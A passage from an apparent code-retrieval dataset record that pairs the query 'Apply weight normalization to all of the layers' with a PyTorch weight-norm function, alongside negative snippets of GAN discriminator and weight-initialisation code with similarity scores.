self.latent_layer = nn.Sequential(nn.Linear(128*ds_size**2, opt.code_dim))\n\n \"\"\"LSGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, bn=True):\n block = [ nn.Conv2d(in_filters, out_filters, 3, 2, 1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Dropout2d(0.25)]\n if bn:\n block.append(nn.BatchNorm2d(out_filters, 0.8))\n return block\n\n self.model = nn.Sequential(\n *discriminator_block(opt.channels, 16, bn=False),\n *discriminator_block(16, 32),\n *discriminator_block(32, 64),\n *discriminator_block(64, 128),\n )\n\n # The height and width of downsampled image\n ds_size = opt.img_size // 2**4\n self.adv_layer = nn.Linear(128*ds_size**2, 1)\n\n \"\"\"Pix2Pix\n \"\"\"\n def discriminator_block(in_filters, out_filters, normalization=True):\n \"\"\"Returns downsampling layers of each discriminator block\"\"\"\n layers = [nn.Conv2d(in_filters, out_filters, 4, stride=2, padding=1)]\n if normalization:\n layers.append(nn.InstanceNorm2d(out_filters))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n self.model = nn.Sequential(\n *discriminator_block(in_channels*2, 64, normalization=False),\n *discriminator_block(64, 128),\n *discriminator_block(128, 256),\n *discriminator_block(256, 512),\n nn.ZeroPad2d((1, 0, 1, 0)),\n nn.Conv2d(512, 1, 4, padding=1, bias=False)\n )\n\n \"\"\"Pixelda\n \"\"\"\n def block(in_features, out_features, 
normalization=True):\n \"\"\"Discriminator block\"\"\"\n layers = [ nn.Conv2d(in_features, out_features, 3, stride=2, padding=1),\n nn.LeakyReLU(0.2, inplace=True) ]\n if normalization:\n layers.append(nn.InstanceNorm2d(out_features))\n return layers\n\n self.model = nn.Sequential(\n *block(opt.channels, 64, normalization=False),\n *block(64, 128),\n *block(128, 256),\n *block(256, 512),\n nn.Conv2d(512, 1, 3, 1, 1))\n\n \"\"\"SRGAN\n \"\"\"\n def discriminator_block(in_filters, out_filters, stride, normalize):\n \"\"\"Returns layers of each discriminator block\"\"\"\n layers = [nn.Conv2d(in_filters, out_filters, 3, stride, 1)]\n if normalize:\n layers.append(nn.BatchNorm2d(out_filters))\n layers.append(nn.LeakyReLU(0.2, inplace=True))\n return layers\n\n layers = []\n in_filters = in_channels\n for out_filters, stride, normalize in [ (64, 1, False),\n (64, 2, True),\n (128, 1, True),\n (128, 2, True),\n (256, 1, True),\n (256, 2, True),\n (512, 1, True),\n (512, 2, True),]:\n layers.extend(discriminator_block(in_filters, out_filters, stride, normalize))\n in_filters = out_filters\n\n # Output layer\n layers.append(nn.Conv2d(out_filters, 1, 3, 1, 1))\n\n self.model = nn.Sequential(*layers)\n\n \"\"\"StarGAN\n \"\"\"\n channels, img_size, _ = img_shape\n\n def discriminator_block(in_filters, out_filters):\n \"\"\"Returns downsampling layers of each discriminator block\"\"\"\n layers = [ nn.Conv2d(in_filters, out_filters, 4, stride=2, padding=1),\n nn.LeakyReLU(0.01)]\n return layers\n\n layers = discriminator_block(channels, 64)\n curr_dim = 64\n for _ in range(n_strided - 1):\n layers.extend(discriminator_block(curr_dim, curr_dim*2))\n curr_dim *= 2\n\n self.model = nn.Sequential(*layers)\n\n # Output 1: PatchGAN\n self.out1 = nn.Conv2d(curr_dim, 1, 3, padding=1, bias=False)\n # Output 2: Class prediction\n kernel_size = img_size // 2**n_strided\n self.out2 = nn.Conv2d(curr_dim, c_dim, kernel_size, bias=False)\n\n \"\"\"WGAN\n \"\"\"\n nn.Linear(int(np.prod(img_shape)), 512),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(512, 256),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Linear(256, 1)\n\n \n\n\n# import torch.nn as nn\n# import torch\n# from torch.nn.modules import conv, Linear\n# import torch.nn.functional as F\n# from src.snlayers.snconv2d import SNConv2d\n\n# class _netG(nn.Module):\n# def __init__(self, nz, nc, ngf):\n# super(_netG, self).__init__()\n# self.main = nn.Sequential(\n# # input is Z, going into a convolution\n# nn.ConvTranspose2d(nz, ngf * 8, 4, 1, 0, bias=True),\n# nn.BatchNorm2d(ngf * 8),\n# nn.ReLU(True),\n# # state size. (ngf*8) x 4 x 4\n# nn.ConvTranspose2d(ngf * 8, ngf * 4, 4, 2, 1, bias=True),\n# nn.BatchNorm2d(ngf * 4),\n# nn.ReLU(True),\n# # state size. (ngf*4) x 8 x 8\n# nn.ConvTranspose2d(ngf * 4, ngf * 2, 4, 2, 1, bias=True),\n# nn.BatchNorm2d(ngf * 2),\n# nn.ReLU(True),\n# # state size. (ngf*2) x 16 x 16\n# nn.ConvTranspose2d(ngf * 2, ngf, 4, 2, 1, bias=True),\n# nn.BatchNorm2d(ngf),\n# nn.ReLU(True),\n# # state size. (ngf) x 32 x 32\n# nn.ConvTranspose2d(ngf, nc, 3, 1, 1, bias=True),\n# nn.Tanh()\n# # state size. 
(nc) x 32 x 32\n# )\n\n# def forward(self, input):\n# output = self.main(input)\n# return output\n\n# # Actor\n# class _netE(nn.Module):\n# def __init__(self, nc, ndf):\n# super(_netE, self).__init__()\n\n# self.main = nn.Sequential(\n# SNConv2d(nc, ndf, 7, 4, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf, 3, 7, 4, 1, bias=False),\n# nn.Sigmoid()\n# )\n# def forward(self, input):\n# output = self.main(input) \n# return output.view(-1, 3).squeeze(1)\n\n# class _netD1(nn.Module):\n# def __init__(self, nc, ndf):\n# super(_netD1, self).__init__()\n\n self.main = nn.Sequential(\n SNConv2d(nc, ndf, 5, 2, 2), \n nn.LeakyReLU(0.2, inplace=True),\n SNConv2d(ndf, ndf * 2, 5, 2, 2),\n nn.LeakyReLU(0.2, inplace=True),\n SNConv2d(ndf * 2, ndf * 4, 5, 2, 2),\n nn.LeakyReLU(0.2, inplace=True),\n SNConv2d(ndf * 4, ndf * 8, 5, 2, 2),\n nn.LeakyReLU(0.2, inplace=True),\n SNConv2d(ndf * 8, 1, 4),\n nn.Sigmoid()\n\n # input is (nc) x 64 x 64\n nn.Conv2d(nc, ndf, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf) x 32 x 32\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*2) x 16 x 16\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*4) x 8 x 8\n nn.Conv2d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*8) x 4 x 4\n nn.Conv2d(ndf * 8, 1, 4, 1, 0, bias=False),\n nn.Sigmoid()\n\n # input is (nc) x 64 x 64\n nn.Conv2d(nc, ndf, 4, 2, 1, bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf) x 32 x 32\n nn.Conv2d(ndf, ndf * 2, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*2) x 16 x 16\n nn.Conv2d(ndf * 2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(ndf * 4, ndf * 16, 4, 2, 1, bias=False),\n nn.BatchNorm2d(ndf * 16),\n nn.LeakyReLU(0.2, inplace=True),\n # state size. (ndf*16) x 4 x 4\n nn.Conv2d(ndf * 16, 1, 4, 1, 0, bias=False),\n nn.Sigmoid()\n # )\n # def forward(self, input):\n # output = self.main(input)\n # output = output.view(-1, 1).squeeze(1)\n # return output\n\n# class _netD2(nn.Module):\n# def __init__(self, nc, ndf):\n# super(_netD2, self).__init__()\n\n# self.main = nn.Sequential(\n# SNConv2d(nc, ndf, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf, ndf, 16, 2, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# # ndf x 30 x 30\n\n# SNConv2d(ndf, ndf * 2, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf * 2, ndf * 2, 16, 2, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# # (ndf * 2) x 9 x 9\n\n# SNConv2d(ndf * 2, ndf * 4, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf * 4, 1, 9, 1, 0, bias=False),\n# nn.Sigmoid()\n# # 1 x 1 x 1\n# )\n# def forward(self, input):\n# output = self.main(input)\n# return output.view(-1, 1).squeeze(1)\n\n# class _netD3(nn.Module):\n# def __init__(self, nc, ndf):\n# super(_netD3, self).__init__()\n\n# self.main = nn.Sequential(\n# # input is (nc) x 32 x 32\n# SNConv2d(nc, ndf, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf, ndf, 4, 2, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# # state size. 
(ndf) x 1 x 32\n# SNConv2d(ndf, ndf * 2, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf*2, ndf * 2, 4, 2, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# # state size. (ndf*2) x 16 x 16\n# SNConv2d(ndf * 2, ndf * 4, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf * 4, ndf * 4, 4, 2, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n\n# SNConv2d(ndf * 4, ndf * 8, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf * 8, ndf * 8, 4, 2, 1, bias=True),\n\n# # state size. (ndf*8) x 4 x 4\n# SNConv2d(ndf * 8, ndf * 16, 3, 1, 1, bias=True),\n# nn.LeakyReLU(0.1, inplace=True),\n# SNConv2d(ndf * 16, 1, 4, 1, 0, bias=False),\n# nn.Sigmoid()\n# )\n# def forward(self, input):\n# output = self.main(input)\n# output = output.view(-1, 1).squeeze(1)\n# return output\n\n\n# _netD_list = [_netD1]", "def __init__(self):\n super().__init__()\n self.dimensionality = 1\n self.distType = 'Continuous'", "def initialise_network(self):\n raise NotImplementedError", "def train_generator(gan, discriminator, batch_size):\n X = get_noise(batch_size)\n # Label noise as real data meaning as 1.0.\n Y = np.ones(batch_size)\n # Freeze discriminator to train generator only.\n discriminator.trainable = False\n gan.train_on_batch(X, Y)", "def build_discriminator2D_SN(self, model_shape, filters=32, k_size=4, drop=True, rate=0.5, summary=False, model_file=None, name='gan_d_'):\n if (model_file):\n \"\"\"\n Load pretreined model\n \"\"\"\n model = self.utils.build_pretrained_model(model_file)\n if (summary):\n model.summary()\n return model\n else:\n \"\"\"\n Create a Discriminator Model using hyperparameters values defined as follows\n \"\"\"\n n_rows = model_shape[0]\n n_cols = model_shape[1]\n c_dims = model_shape[2]\n\n input_shape = (n_rows, n_cols, c_dims) \n input_layer = Input(shape=input_shape, name=name+'input')\n\n d = self.Conv2D_SN_Block(input_layer, filters, k_size=k_size, name=name+'1') # 30x30x32\n d = self.Conv2D_SN_Block(d, 2*filters, k_size=k_size, name=name+'2') # 15x15x64\n d = self.Conv2D_SN_Block(d, 4*filters, k_size=k_size, name=name+'3') # 8x8x128\n d = self.Conv2D_SN_Block(d, 8*filters, strides=1, k_size=k_size, name=name+'4') # 8x8x256\n\n d = Flatten(name=name+'flatten')(d)\n if drop:\n d = Dropout(rate=rate, name=name+'dropout')(d, training=True)\n logits = DenseSN(1, activation='linear', kernel_initializer='glorot_uniform',\n name=name+'dense_SN')(d) #RandomNormal(stddev=0.02)\n out = Activation('sigmoid', name=name+'sigmoid')(logits)\n\n model = Model(inputs=[input_layer], outputs=[out, logits], name='Discriminator')\n if (summary):\n model.summary()\n return model", "def discriminator(self, inpt, reuse, is_train):\n with tf.variable_scope(\"discriminator\"):\n if reuse:\n tf.get_variable_scope().reuse_variables()\n net = conv2d(x=inpt, num_kernels=self.d_init, name=\"conv1\", activation=lkrelu, padding=\"SAME\",\n alpha=0.02, is_train=is_train, stddv=self.stddv)\n net = conv2d(x=net, num_kernels=self.d_init*2, name=\"conv2\", activation=lkrelu, padding=\"SAME\",\n alpha=0.02, is_train=is_train, stddv=self.stddv)\n net = conv2d(x=net, num_kernels=self.d_init*4, name=\"conv3\", activation=lkrelu, padding=\"SAME\",\n alpha=0.02, is_train=is_train, stddv=self.stddv)\n net = conv2d(x=net, num_kernels=self.d_init*8, name=\"conv4\", activation=lkrelu, padding=\"SAME\",\n alpha=0.02, is_train=is_train, stddv=self.stddv)\n net = dense_layer(x=net, num_neurons=1, name=\"output\", activation=tf.identity, is_train=is_train,\n 
stddv=self.stddv)\n return net", "def initialize_ai(self):\n\n self.gid, self.genome = constants.genomes_to_run[self.identifier]\n self.genome.fitness = -1\n self.net = neat.nn.FeedForwardNetwork.create(self.genome, constants.conf)\n # self.net = neat.nn.RecurrentNetwork\n # .create(self.genome, constants.conf)", "def __init__(self, input_size, neurons):\n super().__init__()\n self.input_size = input_size\n self.neurons = neurons\n self.params[\"w\"] = np.random.randn(input_size, neurons)\n self.params[\"b\"] = np.random.randn(1, neurons)\n self.grads = {}", "def init_weights(self, pretrained=None):\n if isinstance(pretrained, str):\n logger = get_root_logger()\n load_checkpoint(self, pretrained, strict=False, logger=logger)\n elif pretrained is None:\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n normal_init(m, std=0.001)\n elif isinstance(m, (_BatchNorm, nn.GroupNorm)):\n constant_init(m, 1)\n else:\n raise TypeError('pretrained must be a str or None')", "def init_weights(self, pretrained=None):\n if isinstance(pretrained, str):\n logger = get_root_logger()\n load_checkpoint(self, pretrained, strict=False, logger=logger)\n elif pretrained is None:\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n normal_init(m, std=0.001)\n elif isinstance(m, (_BatchNorm, nn.GroupNorm)):\n constant_init(m, 1)\n else:\n raise TypeError('pretrained must be a str or None')", "def init_weights(self, pretrained=None):\n if isinstance(pretrained, str):\n logger = get_root_logger()\n load_checkpoint(self, pretrained, strict=False, logger=logger)\n elif pretrained is None:\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n normal_init(m, std=0.001)\n elif isinstance(m, (_BatchNorm, nn.GroupNorm)):\n constant_init(m, 1)\n else:\n raise TypeError('pretrained must be a str or None')" ]
[ "0.67468584", "0.62949085", "0.6285982", "0.62006986", "0.6102082", "0.60385245", "0.6021358", "0.60148615", "0.60062915", "0.5981237", "0.59416723", "0.590252", "0.5898757", "0.5888632", "0.58052456", "0.5799055", "0.5795089", "0.5771385", "0.5755582", "0.5748591", "0.57218456", "0.57085013", "0.5690192", "0.5684907", "0.56731766", "0.56665397", "0.5660035", "0.5656763", "0.5654221", "0.5647478", "0.56444424", "0.5636443", "0.5636206", "0.56318617", "0.56295055", "0.561453", "0.5608455", "0.56081814", "0.56063396", "0.56005216", "0.5598679", "0.5596407", "0.5575576", "0.5574488", "0.55723345", "0.5571318", "0.55502874", "0.5547292", "0.5545264", "0.5541341", "0.5527504", "0.5526878", "0.5506348", "0.5505247", "0.5503381", "0.5501094", "0.5492081", "0.54789484", "0.5472313", "0.5465623", "0.54359794", "0.54276305", "0.54250824", "0.5421294", "0.5419131", "0.54180276", "0.54095364", "0.5406432", "0.5400964", "0.5398996", "0.53981626", "0.53956765", "0.5394608", "0.53893787", "0.53877723", "0.5387108", "0.53867245", "0.53825134", "0.5381987", "0.53803325", "0.5365756", "0.53627354", "0.53567743", "0.5355726", "0.535227", "0.53457123", "0.53452665", "0.5344346", "0.53421056", "0.5340289", "0.53397626", "0.5337732", "0.5336359", "0.53311986", "0.5331116", "0.5328858", "0.5325253", "0.53216684", "0.5316128", "0.5316128", "0.5316128" ]
0.0
-1
Apply weight normalization to all of the layers.
def apply_weight_norm(self): def _apply_weight_norm(m): if isinstance(m, torch.nn.Conv1d) or isinstance( m, torch.nn.ConvTranspose1d ): torch.nn.utils.weight_norm(m) logging.debug(f"Weight norm is applied to {m}.") self.apply(_apply_weight_norm)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def _init_weights(self):\n for layer in self.modules():\n if isinstance(layer, (nn.Conv1d, nn.Linear)):\n nn.init.xavier_uniform_(layer.weight)\n if layer.bias is not None:\n nn.init.constant_(layer.bias, 0)\n elif isinstance(layer, nn.BatchNorm1d):\n nn.init.constant_(layer.weight, 1)\n nn.init.constant_(layer.bias, 0)", "def associate_normalization_layers(self, model):\n if (len(self.leaf_modules) == 0):\n self.retrieve_leaf_modules(model) \n # Association list\n self.norm_modules = []\n self.prune_modules = []\n # Current weighted layer\n cur_weighted = None\n # Associate norm layers to their immediate previous weighted layers\n for name, m in self.leaf_modules:\n if (m.__class__ in [nn.Linear, nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.ConvTranspose2d, nn.ConvTranspose3d]):\n cur_weighted = m\n if (m.__class__ in [nn.RNN, nn.GRU, nn.LSTM]):\n cur_weighted = m\n if ('Norm' in str(m.__class__)):\n if (cur_weighted is not None):\n self.norm_modules.append((m, cur_weighted))", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _init_weights(self):\n for m in self.modules():\n if type(m) in {\n nn.Linear,\n nn.Conv3d,\n nn.Conv2d,\n nn.ConvTranspose2d,\n nn.ConvTranspose3d\n }:\n nn.init.kaiming_normal_(\n m.weight.data, a=0, mode='fan_out', nonlinearity='relu',\n )\n if m.bias is not None:\n fan_in, fan_out = \\\n nn.init._calculate_fan_in_and_fan_out(m.weight.data)\n bound = 1 / math.sqrt(fan_out)\n nn.init.normal_(m.bias, -bound, bound)", "def normalize_weights(self):\n total_weight = sum(self.weights)\n self.norm_weights = self.weights / float(total_weight)", "def _initialize_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0, 0.05)\r\n if m.bias is not None:\r\n m.bias.data.zero_()", "def initialize_weights(self):\n for layer in self._cnn_layers:\n weights_initializer.WeightsInitializer.initialize_layer_or_model(layer)", "def init_weights(self):\n # We don't use the `init_weights()` function in BaseModule, since it\n # doesn't support the initialization method from `reset_parameters()`\n # in Pytorch.\n if self.with_backbone:\n self.backbone.init_weights()\n\n if self.with_neck:\n for m in self.neck.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()\n\n if self.with_head:\n for m in self.head.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n xavier_uniform_(m.weight)\n if m.bias is not 
None:\n zeros_(m.bias)", "def normalize_weights(self):\n \n # Set negative weights to zero\n # Normalize to sum to one.\n \n\n\n self.new_weight=[]\n for i in self._weights:\n if any(i < 0 for i in self._weights):\n self.new_weight = [0,1]\n\n elif all(i == 0 for i in self._weights):\n i = 1/len(self._weights)\n self.new_weight.append(i)\n else:\n i = i/sum(self._weights)\n self.new_weight.append(i)\n\n # If the weights are all zeros, set weights equal to 1/k, where k is the number\n # of components.\n self._weights = self.new_weight\n self._weights = np.round(self._weights,3)", "def normalizeWeights(self):\n for wt in self.weights:\n wt[wt>1] = 1\n wt[wt<-1] = -1\n for bs in self.bias:\n bs[bs>1] = 1\n bs[bs<-1] = -1", "def _reset_weights(m):\n\n nn = import_optional_dependency(\"torch.nn\")\n init = import_optional_dependency(\"torch.nn.init\")\n if isinstance(m, nn.Conv1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm1d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm3d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.Linear):\n init.xavier_normal_(m.weight.data)\n init.normal_(m.bias.data)\n elif isinstance(m, nn.LSTM):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.LSTMCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRU):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRUCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)", "def remove_norms(module_: \"WN\") -> \"WN\":\n module_.start = torch.nn.utils.remove_weight_norm(module_.start_conv)\n module_.cond_layer = torch.nn.utils.remove_weight_norm(module_.cond_layer)\n for i, layer_ in enumerate(module_.in_layers):\n layer_ = DepthwiseSeparableConv1d.remove_batch_norm(layer_)\n module_.in_layers[i] = layer_\n for i, layer_ in enumerate(module_.res_skip_layers):\n layer_ = torch.nn.utils.remove_weight_norm(layer_)\n module_.res_skip_layers[i] = layer_\n return module_", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n 
p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.ent_proj_vects.data = normalize(self.ent_proj_vects.data, p=2, dim=1)\n self.rel_proj_vects.data = normalize(self.rel_proj_vects.data, p=2, dim=1)", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n xavier_init(m)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.projection_matrices.data = normalize(self.projection_matrices.data, p=2, dim=2)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)", "def init_weights(self, clz):\n for ch in self.children():\n if issubclass(ch.__class__, nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: clz._init_weights(self.lrm, module))", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)\n self.normal_vectors.data = normalize(self.normal_vectors, p=2, dim=1)", "def remove_weight_norm_(self):\n\n def _remove_weight_norm(m):\n try:\n torch.nn.utils.remove_weight_norm(m)\n except ValueError:\n return\n\n self.apply(_remove_weight_norm)", "def init_weight(self):\n init_layer(self.conv1)\n init_layer(self.conv2)\n init_bn(self.norm1)\n init_bn(self.norm2)", "def normalize(self, weights):\n tot = sum(weights)\n newW = [-1] * self.numParticles\n for i in range(len(weights)):\n newW[i] = weights[i] / tot\n return newW", "def layer_normalize_(self, ref_point: 'ModelParameters', order=2):\n # in-place normalize each parameter\n for layer_idx, parameter in enumerate(self.parameters, 0):\n parameter *= (ref_point.layer_norm(layer_idx, order) / self.layer_norm(layer_idx, order))", "def init_weights(self):\n\n for ch in self.children():\n if issubclass(ch.__class__, torch.nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: self.transformer.__class__._init_weights(self.transformer, module))", "def _rescale_module(module):\n for sub in module.modules():\n if isinstance(sub, (nn.Conv1d, nn.ConvTranspose1d, nn.Conv2d, nn.ConvTranspose2d)):\n std = sub.weight.std().detach()\n scale = (std / 0.1) ** 0.5\n sub.weight.data /= scale\n if sub.bias is not None:\n sub.bias.data /= scale", "def init_weights(layer):\r\n layer_name = layer.__class__.__name__\r\n if layer_name.find(\"Conv\") != -1:\r\n layer.weight.data.normal_(0.0, 0.02)\r\n elif layer_name.find(\"BatchNorm\") != -1:\r\n layer.weight.data.normal_(1.0, 0.02)\r\n layer.bias.data.fill_(0)", "def init_weights(layer):\n layer_name = layer.__class__.__name__\n if layer_name.find(\"Conv\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(0.0, 0.02)\n elif layer_name.find(\"BatchNorm\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(1.0, 0.02)\n layer.bias.data.fill_(0)", "def _compute_weights(self):\n with tf.name_scope('compute_weights'):\n self.layer.kernel = tf.nn.l2_normalize(\n self.v, axis=self.kernel_norm_axes) * self.g", "def init_weights(self):\n 
for m in self.cls_convs:\n normal_init(m.conv, std=0.01)\n for m in self.reg_convs:\n normal_init(m.conv, std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.retina_cls, std=0.01, bias=bias_cls)\n normal_init(self.retina_reg, std=0.01)", "def apply_on_layer(self, layer):\n init_g = Constant(1.)\n\n try:\n weight_tag = 'W' if hasattr(layer, 'W') else 'U'\n except AttributeError:\n raise AttributeError(\"Trying to call weight norm on {} \".format(layer)+\\\n \"without layer.W or layer.U defined\")\n weights = getattr(layer, weight_tag)\n\n Wndim = weights.get_value().ndim\n if Wndim == 4:\n W_axes_to_sum = (1,2,3)\n W_dimshuffle_args = (0,'x','x','x')\n elif Wndim == 5:\n W_axes_to_sum = (1,2,3,4)\n W_dimshuffle_args = (0,'x','x','x','x')\n elif Wndim == 3 :\n raise NotImplementedError(\"What is a weight with 3 dimensions?\")\n else :\n W_axes_to_sum = 0\n W_dimshuffle_args = ('x',0)\n\n if self.train_g is not None:\n g = init_g(layer.output_dims)\n g = theano.shared(g, name=layer.prefix+'_g')\n if self.train_g :\n layer.params += [g]\n\n new_weights = weights * (\n g / T.sqrt(1e-6 + T.sum(T.square(weights),\n axis=W_axes_to_sum))).dimshuffle(*W_dimshuffle_args)\n layer.g = g\n else:\n new_weights = weights / \\\n T.sqrt(1e-6 + T.sum(T.square(weights),\n axis=W_axes_to_sum,keepdims=True))\n\n setattr(layer, weight_tag, new_weights)", "def normalize_weights(w, dims=(0,), bias=1e-5):\n with tf.name_scope('normalization'):\n return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))", "def remove_weight_norm(self):\n\n def _remove_weight_norm(m):\n try:\n logging.debug(f\"Weight norm is removed from {m}.\")\n torch.nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n\n self.apply(_remove_weight_norm)", "def remove_weight_norm(self):\n\n def _remove_weight_norm(m):\n try:\n logging.debug(f\"Weight norm is removed from {m}.\")\n torch.nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n\n self.apply(_remove_weight_norm)", "def init_weights(self):\n for m in self.cls_convs:\n normal_init(m.conv, std=0.01)\n for m in self.reg_convs:\n normal_init(m.conv, std=0.01)\n normal_init(self.atss_reg, std=0.01)\n normal_init(self.atss_iou, std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.atss_cls, std=0.01, bias=bias_cls)", "def layer_norm(input, normalized_shape, weight, bias, eps=1e-5):\n return FunctionLib.apply(\n 'LayerNorm', input.device, [input, weight, bias],\n axis=input.ndimension() - len(normalized_shape), epsilon=eps)", "def init_weights(model, fc_init_std=0.01):\n for m in model.modules():\n if isinstance(m, nn.Conv3d):\n \"\"\"\n Follow the initialization method proposed in:\n {He, Kaiming, et al.\n \"Delving deep into 